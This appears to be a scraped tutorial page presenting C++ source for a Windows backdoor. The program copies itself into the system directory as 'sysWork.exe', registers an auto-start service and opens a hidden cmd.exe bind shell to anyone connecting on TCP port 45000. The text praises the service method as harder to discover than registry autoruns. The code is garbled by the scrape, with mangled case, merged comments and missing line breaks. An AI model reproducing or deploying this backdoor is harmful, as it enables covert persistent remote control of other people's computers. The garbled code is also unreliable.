Brief introduction
Windows NT system Backdoor to implement self-booting, there are many ways, such as the registry self-boot , image hijacking technology ,svchost self-booting and the introduction of this section of the Service self-initiated methods, The service self-priming is less likely to be discovered than the three other types of startup methods needed to modify the registry.
Examples of C + + code
filename:serviceautorundemo.cpp//Creator: peterz1997//date:2018-5-4 23:19//comment:create Service to make the backdoor Run automatically////////////////////// #include <iostream> #include <WinSock2.h> #include < winsock.h> #include <windows.h> #include <Winsvc.h> #include <cstdio> #include <cstring># pragma comment (lib, "Ws2_32.lib") using namespace std; #define Service_op_error-1#define Service_already_run-2const unsigned int max_count = 255; String Max lengthconst DWORD PORT = 45000; Listen portconst unsigned int link_count = 30; Max Link numberservice_status g_servicestatus; Service_status_handle g_hservicestatus;/** * @brief CallBack Function to Translate Service Control Code * @param dwcode Se Rvice Control Code */void WINAPI servicecontrol (DWORD dwcode) {switch (Dwcode) {//service pause case Service_conTROL_PAUSE:g_ServiceStatus.dwCurrentState = service_paused; Break Service Continuation Case SERVICE_CONTROL_CONTINUE:g_ServiceStatus.dwCurrentState = service_running; Break Service Stop Case SERVICE_CONTROL_STOP:g_ServiceStatus.dwCurrentState = service_stopped; G_servicestatus.dwwin32exitcode = 0; G_servicestatus.dwcheckpoint = 0; G_servicestatus.dwwaithint = 0; Break Case Service_control_interrogate:break; Default:break; }//Set service state if (SetServiceStatus (g_hservicestatus, &g_servicestatus) = = 0) {printf ("Set service status Error\n "); } return; /** * @brief Start Remote Shell * @lpParam the Client Handle */dword WINAPI Startshell (lpvoid lpparam) {startupinfo si; Process_information Pi; CHAR Cmdline[max_count] = {0}; Getstartupinfo (&SI); SI.CB = sizeof (STARTUPINFO); Si.hstdinput = Si.hstdoutput = Si.hstderror = (HANDLE) Lpparam; Si.dwflags = STArtf_useshowwindow | Startf_usestdhandles; Si.wshowwindow = Sw_hide; GetSystemDirectory (cmdline, sizeof (cmdline)); strcat_s (cmdline, sizeof (CmdLine), "\\cmd.exe"); while (! CreateProcess (NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &SI, &PI)) {Sleep (100); } WaitForSingleObject (Pi.hprocess, INFINITE); CloseHandle (pi.hprocess); CloseHandle (Pi.hthread); return 0;} /** * @brief Service Running Function * @lpParam NULL */dword WINAPI runservice (lpvoid lpparam) {CHAR Wmessage[max_coun T] = "<================= Welcome to back Door >_< ==================>\n"; SOCKET sclient[30]; DWORD dwthreadid[30]; HANDLE hthread[30]; Wsadata WSD; if (WSAStartup (0x0202, &WSD)) {printf ("WSAStartup Process error\n"); return 0; } SOCKET Slisten = WSASocket (Af_inet, Sock_stream, ipproto_tcp, NULL, 0, 0); Sockaddr_in sin; sin.sin_family = af_inet; Sin.sin_port = htons (port); Sin.sin_addr. S_un. S_aDDR = Inaddr_any; if (Bind (Slisten, (lpsockaddr) &sin, sizeof (SIN))) return 0; if (Listen (Slisten, link_count)) return 0; for (int i = 0; i < Link_count; i++) {Sclient[i] = accept (Slisten, NULL, NULL); Hthread[i] = CreateThread (NULL, 0, Startshell, (LPVOID) sclient[i], 0, &dwthreadid[i]); Send (Sclient[i], Wmessage, strlen (Wmessage), 0); } waitformultipleobjects (Link_count, Hthread, TRUE, INFINITE); return 0;} /** * @brief The Main Function of the Service */void WINAPI servicemain (DWORD dwargc, LPTSTR *lpargv) {HANDLE hthread; G_servicestatus.dwcheckpoint = 0; g_servicestatus.dwcontrolsaccepted = Service_accept_pause_continue | Service_accept_stop; G_servicestatus.dwcurrentstate = service_start_pending; G_servicestatus.dwservicespecificexitcode = 0; G_servicestatus.dwservicetype = Service_win32; G_servicestatus.dwwaithint = 0; G_servicestatus.dwwin32exitcode = 0; G_hservicestatus = RegisterServiceCtrlHandler ("Backdoor ", ServiceControl); if (!g_hservicestatus) {printf ("Register Service error\n"); Return } g_servicestatus.dwcurrentstate = service_running; G_servicestatus.dwcheckpoint = 0; G_servicestatus.dwwaithint = 0; if (! SetServiceStatus (G_hservicestatus, &g_servicestatus)) {printf ("Set servicestatus Error!\n"); Return } hthread = CreateThread (null, 0, runservice, NULL, 0, NULL); if (!hthread) {printf ("Create Thread error\n"); } return; /** * @brief Install Service */int apientry installservice () {DWORD dwerrorcode; Sc_handle Hscmanager; Sc_handle Hservicehandle; Service_status Ssservicestatus; CHAR Szsystempath[max_count] = "n"; CHAR Szfileselfpath[max_count] = "n"; GetSystemDirectory (Szsystempath, sizeof (Szsystempath)); GetModuleFileName (NULL, Szfileselfpath, sizeof (Szfileselfpath)); strcat_s (Szsystempath, "\\sysWork.exe"); CopyFile (Szfileselfpath, Szsystempath, true); Hscmanager = OpenSCManager (null, NULL, sc_manager_all_access); if (!hscmanager) {printf ("Can not Open the Service manager\n"); return service_op_error; } printf ("Service Manager opened success\n"); Hservicehandle = CreateService (Hscmanager, "backdoor", "backdoor", service_all_access, Service_win32_own_process, Service_Auto_Start, Service_error_ignore, szsystempath, NULL, NULL, NULL, NULL, or NULL); if (!hservicehandle) {Dwerrorcode = GetLastError (); if (Dwerrorcode = = error_service_exists) {hservicehandle = OpenService (Hscmanager, "backdoor", Service_ all_access); if (!hservicehandle) {printf ("Can not Create/open service\n"); Closeservicehandle (Hservicehandle); return service_op_error; } else {printf ("Service opened success\n"); }}} else {printf ("Service Create success\n "); } if (! StartService (hservicehandle, 0, NULL)) {Dwerrorcode = GetLastError (); if (Dwerrorcode = = error_service_already_running) {printf ("Serveice is already running\n"); Closeservicehandle (Hservicehandle); Closeservicehandle (Hscmanager); return service_already_run; } else {printf ("Serveice START error\n"); Closeservicehandle (Hservicehandle); Closeservicehandle (Hscmanager); return service_op_error; }} while (QueryServiceStatus (Hservicehandle, &ssservicestatus)) {if (ssservicestatus.dwcurrentstate = = service_start_pending) {Sleep (100); Continue } if (ssservicestatus.dwcurrentstate! = service_running) {printf ("SERVICE Start Process error\n" ); Closeservicehandle (Hservicehandle); Closeservicehandle (Hscmanager); Return SERVICe_op_error; } else {break; }} if (! QueryServiceStatus (Hservicehandle, &ssservicestatus)) {printf ("Service Status Get error\n"); Closeservicehandle (Hservicehandle); Closeservicehandle (Hscmanager); return service_op_error; } printf ("Service Start success\n"); Closeservicehandle (Hservicehandle); Closeservicehandle (Hscmanager); return 0;} /** * @brief Remove Service */int removeservice () {Sc_handle hscmanager; Sc_handle Hservicehandle; Service_status Ssservicestatus; Hscmanager = OpenSCManager (null, NULL, sc_manager_all_access); if (!hscmanager) {printf ("Open Service Manager error\n"); return service_op_error; } printf ("Open Service Manager success\n"); Hservicehandle = OpenService (Hscmanager, "backdoor", service_all_access); if (!hservicehandle) {printf ("Open Service error\n"); return service_op_error; } printf ("Open Service Success\n "); if (QueryServiceStatus (Hservicehandle, &ssservicestatus)) {if (ssservicestatus.dwcurrentstate = = SERVICE_RU nning) {ControlService (Hservicehandle, Service_control_stop, &ssservicestatus); }} else {printf ("Service Status Get error\n"); Closeservicehandle (Hservicehandle); Closeservicehandle (Hscmanager); return service_op_error; } if (! DeleteService (Hservicehandle)) {printf ("Delete Service error\n"); Closeservicehandle (Hservicehandle); Closeservicehandle (Hscmanager); return service_op_error; } printf ("Remove Service success\n"); Closeservicehandle (Hservicehandle); Closeservicehandle (Hscmanager); return 0;} /** * @brief main Function */int main (int argc, char* argv[]) {service_table_entry svtable[] = {{(LPSTR) "Backdo or ", ServiceMain}, {null,null}}; StartServiceCtrlDispatcher (svtable); if (argc = = 2) {if (!STRICMP (argv[1], "--install")) {if (installservice () = = Service_op_error) {printf ("[!] Service Operation Error\n "); } else {printf ("[*]service Operation Success\n"); }} else if (!stricmp (argv[1], "--remove")) {if (removeservice () = = Service_op_error) {printf ("[!] Service Operation Error\n "); } else {printf ("[*]service Operation Success\n"); }} else {printf ("[Usage] = *.exe [--install]/[--remove]\n"); }} else {printf ("[Usage] = *.exe [--install]/[--remove]\n"); } return 0;}
Secure Path--c/c++ implement backdoor service self-start